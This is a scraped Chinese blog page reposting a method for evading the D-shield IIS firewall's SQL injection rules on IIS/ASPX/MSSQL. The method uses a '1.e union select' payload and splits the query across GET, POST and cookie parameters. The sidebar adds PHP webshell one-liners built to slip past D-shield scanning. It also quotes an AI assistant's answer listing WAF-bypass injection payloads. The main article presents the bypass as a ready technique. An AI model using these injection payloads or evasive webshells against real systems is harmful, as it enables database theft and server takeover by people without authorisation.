Bypass之D盾IIS防火墙SQL联合注入绕过（新版）

最新推荐文章于 2025-05-25 18:42:21 发布

白帽梦想家

最新推荐文章于 2025-05-25 18:42:21 发布

阅读量1.2w

点赞数

分类专栏：渗透姿势收集文章标签： D盾SQL注入联合查询绕过检测

渗透姿势收集专栏收录该内容

3 篇文章

订阅专栏

这种技术文章，不好意思标原创了，一下内容均来自公众号
Bypass

实验环境

IIS+ASPX+MSSQL

一、MSSQL特性
在MSSQL中，参数和union之间的位置，常见的可填充的方式有如下几种：

1.空白字符

01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

2.注释符号

Mssql也可以使用注释符号/**/

3.浮点数

select * from admin where id=1.1union select 1,'2',db_name() from admin

4.1E0的形式：

select * from admin where id=1e0union select 1,'2',db_name() from admin

但是很遗憾，以上几种填充方式都无法绕过D盾的union select检测

二、bypass Fuzz

针对构造的SQL注入点，进行Fuzz参数和union之间的位置

http://192.168.8.161/sql.aspx?id=1【Fuzz位置】union select null,null,SYSTEM_USER

Fuzz结果：通过1.e这种特殊的数值形式，可成功绕过union select防御。

1803112887.png

到这里，可union select，形成了部分Bypass，接下来考虑，如何去绕过select from的防御规则。

三、个人觉得比较厉害的 ASPX HPP特性绕过

假设GET/POST/COOKIE同时提交的参数id，服务端接收参数id的顺序是什么样呢？

ASPX+IIS：同时提交参数id，会接收所有参数，通过逗号分隔，如下图：

二、Bypass 测试

利用ASPX+IIS同时接收参数的方式比较特别，可以用这个特性来搞事。利用这个特性来拆分select from，从而绕过D盾的SQL注入防御规则。

总之就是用 1.e 来绕过D盾对union select的检测

用ASPX的特性，将要输入的payload语句放在 GET,POST,COOKIE的位置传输，来绕过D盾对select from语句的检测

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

白帽梦想家

关注关注

0
点赞
踩
15

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

sql注入绕过

飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘

02-16

1124

【代码】sql注入绕过。

绕过D盾，D盾实战绕过

11-18

绕过D盾实战，想学习的同学。。抓紧，这是一个带实战的视频。更有一个提升。

1 条评论您还未登录，请先登录后发表或查看评论

weixin_31437187的博客

02-03

338

D盾旧版：00前言D盾_IIS防火墙，目前只支持Win2003服务器，前阵子看见官方博客说D盾新版将近期推出，相信功能会更强大，这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防御策略，如下图，主要防御GET/POST/COOKIE，文件允许白名单设置。构造不同的测试环境，IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL)，看到这边的策略，主要的测试思路：a、白名单...

SQL注入：从原理到实战，新手必防的“数据库漏洞杀手”（联合查询注入篇）

最新发布

2302_81945070的博客

05-25

885

联合查询注入（Union-Based SQL Injection）作为SQL注入攻击中的"黄金手法"，因其高效性和直接性成为渗透测试的核心技术。本文将用渗透测试视角，带您揭开数据库攻防的神秘面纱。

Bypass D盾_IIS防火墙SQL注入防御（多姿势）

09-14

1629

 0X01 前言 　　D盾_IIS防火墙，目前只支持Win2003服务器，前阵子看见官方博客说D盾新版将近期推出，相信功能会更强大，这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防御策略，如下图，主要防御GET/POST/COOKIE，文件允许白名单设置。构造不同的测试环境，IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL...

sqlmap绕过d盾_姿势分享——SQL注入bypass D盾

weixin_39594080的博客

12-09

5928

首先感谢兄弟们的支持与关注，我们的成长离不开您的陪伴在我们做项目的途中经常会遇到各种各样的waf，防火墙等来拦截我们的payload，这很是让渗透测试人员头疼，其实网上就有很多关于waf绕过原理的文章，这篇文章就是想告诉大家，当大家理解了网上关于waf绕过的文章的内容并对其原理了解后，其实把理论深化进实践中并没有多困难，本篇文章就是将一个简单常规的小思路实践了一下，便成功绕过了D盾的wa...

注入mysql win2003服务器密码_Win2003服务器防SQL注入神器--D盾_IIS防火墙

weixin_36464343的博客

01-19

222

0X01 前言D盾_IIS防火墙，目前只支持Win2003服务器，前阵子看见官方博客说D盾新版将近期推出，相信功能会更强大，这边分享一下之前的SQL注入防御的测试情况。D盾_IIS防火墙注入防御策略，如下图，主要防御GET/POST/COOKIE，文件允许白名单设置。构造不同的测试环境，IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL)，看到这边的策略，主要的测试思路：a、白名单 ...

第06篇：Bypass D盾_IIS防火墙SQL注入防御（多姿势）1

08-03

思路：a、白名单 b、绕过union select或select from的检测搭建这个window2003+IIS+php+mysql，可花费不少时间，测试过

第一篇：Bypass D盾_IIS防火墙SQL注入防御（多姿势）1

08-03

这边的策略，主要的测试思路：a、白名单 b、绕过union select或select from的检测搭建这个window2003+IIS+php+mysql，

weixin_29543939的博客

02-06

997

0x00 前言护卫神一直专注服务器安全领域，其中有一款产品，护卫神·入侵防护系统，提供了一些网站安全防护的功能，在IIS加固模块中有一个SQL防注入功能。这边主要分享一下几种思路，Bypass 护卫神SQL注入防御。0x01 环境搭建软件版本：护卫神·入侵防护系统 V3.8.1 最新版本测试环境：IIS+ASP/ASPX+MSSQL IIS+PHP+MySQL0x02 WAF测...

第三篇：Bypass ngx_lua_waf SQL注入防御（多姿势）1

08-03

### Bypass ngx_lua_waf SQL注入防御方法解析 #### 0x00 前言 ngx_lua_waf是一款基于ngx_lua的Web应用防火墙，以其高性能和轻量级著称。它内置了一系列针对常见攻击手段（如SQL注入）的防御规则。然而，任何安全...

46、47-绕过WAF（Web应用程序防火墙）--介绍、主要功能、部署模式、分类及注入绕过方式等

XLbb的博客

06-03

2274

网站WAF是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能等模块。能够为用户提供实时的网站安全；IP黑白名单功能允许用户设置个性化的IP信任列表，直接屏蔽或者允许指定IP访问网站。同时，增加iP临时黑名单功能，以及实现了针对某个功能的iP白名单功能。同时，爬虫白名单提供爬虫信任机制，在出现误拦截情况下，允许用户自定义爬虫信任。

Bypass D盾_防火墙（新版）SQL注入防御.pdf

12-21

Bypass D盾_防火墙（新版）SQL注入防御.pdf

Sql server注入之注入绕过

qq_42990434的博客

12-17

4910

本章目录：绕过特性前言测试常见函数绕WAF\-WTS绕安全狗简介简单的爆错bypass简单的联合bypass盲注与储存过程其他绕过语句：绕D盾绕过特性前言我们经常利用一些数据库特性来进行WAF绕过。在MSSQL中，比如可以这样：浮点数形式：id=1.1union select 科学计数法形式：id=1e0union select 但其实还可以这样子：id=1.eunion select 通过1.e这样的形式，可以用它绕过D盾的SQL注入防护，通过简单的Fuzz，我们来一起探索一下M

sql注入遇D盾-

A19911511842的博客

01-24

996

最后变形为where id like if(ascii(left(current_user,1))like 98,1,0)把这个变成我们常见的就可以了例如：select * from cms_xxxx where id=1;Waf过滤规则很简单过滤了一些常见的函数随便替换一个即可绕过小waf 拿捏了。发现我们的输入能直接拼接在查询语句中只是拼接的位置和平常的不太一样换个思路。界面变了 id=1 id=0有明显变化这轮子能用。这waf又来了绕通过测试拦截了=数字型看/1 /0的区别。

绕过D盾一句话

Home to come

04-16

1157

通过网上各种渠道搜索，我一共上传了16个php文件，只有两个文件成功绕过了D盾 1. <?php eval('' . get() . ''); /** * @return string */ function get() { $get = $_GET['password']; return $get; } <?php $a=1;$b="a=".$_GE...

sqlmap绕过d盾_记一次很迷的绕过D盾的经历

weixin_39949473的博客

12-09

2696

今天上课的时候，无聊的我看着qq中的群聊，突然看到一个学弟说有个存在D盾的站绕不过去，我心想到我展现自己的时候了，互加好友之后，也拿到了站点。一个单引号打过去给我拦截了。被拦截了，也要想办法毕竟不能丢脸，尝试了很多办法都没有绕过。睡着还被老师发现，让我站起来回答问题，啊这，我灵机一动说我趴着听课呢？逃过一劫，但做人不能放弃啊，我下课直接去吃饭了，已经放弃的我打算写作业，然后又想起来那个站...

简单绕过d 盾 (免杀马)

wsitcj的博客

03-29

746

用代码执行的思路绕过,设置一个类，把他绕晕（手动滑稽） <?php Class hello{ public function pingjie(){ $a="ass"; $b="ert"; return $a.$b; } public function __construct($str){ $this->name = $str; } public function __destruct(){ $t=$this->pingjie(); $t($this

绕过D盾的一句话

03-05

5808

一个很简单的一个技巧，作个笔记，可以绕过D盾检测。新建test1.php <?php eval($_POST[g]); ?> 新建test2.php <?php $a="$_POST[g]"; eval($a=$a); ?> 使用D盾_Web查杀 V2.0.9 进行查杀，test1.php可以查杀出来，但是test2.php无法查杀。那么问题就出现...

sql注入绕过D盾

03-28

<think>嗯，用户问的是SQL注入绕过D盾的方法。首先，我需要确认D盾是什么。D盾可能是一款防火墙或者入侵检测系统，专门用来防御Web攻击，比如SQL注入。接下来，我应该回忆常见的SQL注入绕过技术，并结合D盾的特点来分析可能的绕过方法。首先，用户可能需要知道D盾的检测机制。通常，这类工具会检测常见的SQL关键字，比如SELECT、UNION、WHERE等，或者特殊字符如单引号、注释符。所以绕过的方法可能包括混淆这些关键字，比如大小写变换、插入注释或空白符，或者使用URL编码。然后，我需要考虑具体的绕过技巧。比如，使用字符串拼接，像用CONCAT('sel','ect')代替SELECT；或者利用十六进制编码，把字符串转换成十六进制形式，避免使用引号。还有，是否可以利用时间盲注或其他盲注方式，因为D盾可能对即时的错误回显有检测，但时间盲注通过延迟响应来获取信息，可能更隐蔽。另外，用户可能想知道如何测试这些方法，比如通过修改HTTP请求的参数，使用工具如Burp Suite来构造和发送恶意请求，观察响应是否有变化或是否被拦截。同时，提醒用户注意法律和道德问题，未经授权的测试是非法的。需要注意，不同的版本或配置的D盾可能有不同的检测规则，所以一种方法可能在某些情况下有效，而在其他情况下无效。因此，保持技术更新和持续测试是关键。最后，要确保回答结构清晰，分点列出方法，并强调防御的重要性，比如参数化查询和输入验证，帮助用户不仅了解攻击方法，也加强防护意识。</think>SQL注入绕过D盾的常见方法及原理分析： 1. **混淆关键字符** - 使用URL编码：`SELECT` → `%53%45%4C%45%43%54` - 插入注释符：`SEL/**/ECT` 或 `SEL/*!*/ECT` - 大小写混合：`SeLeCt`（部分WAF对大小写不敏感） 2. **等价替换技术** - 空字符截断：`%00SELECT`（利用空字节截断过滤规则） - 特殊符号分割：`SEL[+E]CT` 或 `SEL%0bECT` - 注释符干扰：`UNION/*bypass*/SELECT` 3. **参数污染攻击** - 提交重复参数：`?id=1&id=2 union select 1,2,3--` - 利用不同参数解析顺序绕过检测 4. **时间盲注绕过** - 使用延时函数： ```sql ' OR IF(ASCII(SUBSTR(database(),1,1))>100,sleep(3),1)-- ``` - 结合位运算减少特征字符 5. **分块传输编码** - 通过`Transfer-Encoding: chunked`分割恶意载荷 - 示例： ``` 3 un 2 io 4 n s ``` 6. **二次编码绕过** - 双重URL编码：`%2527` → `'` - 混合编码类型：`%u0027`（Unicode编码） 7. **非常规语句构造** - 使用`LIKE`代替`=`： ```sql ' OR 1 LIKE 1-- ``` - 利用数学表达式：`(1)div(0)`代替显式报错防御建议： 1. 使用预编译语句（参数化查询） 2. 严格限制数据库权限（最小权限原则） 3. 启用WAF的语义分析功能 4. 对输入进行多层级过滤验证 5. 定期更新防护规则库注意：本文仅用于安全研究学习，未经授权测试他人系统属于违法行为。实际防护需结合多层防御体系，单一检测工具无法完全阻止高级攻击。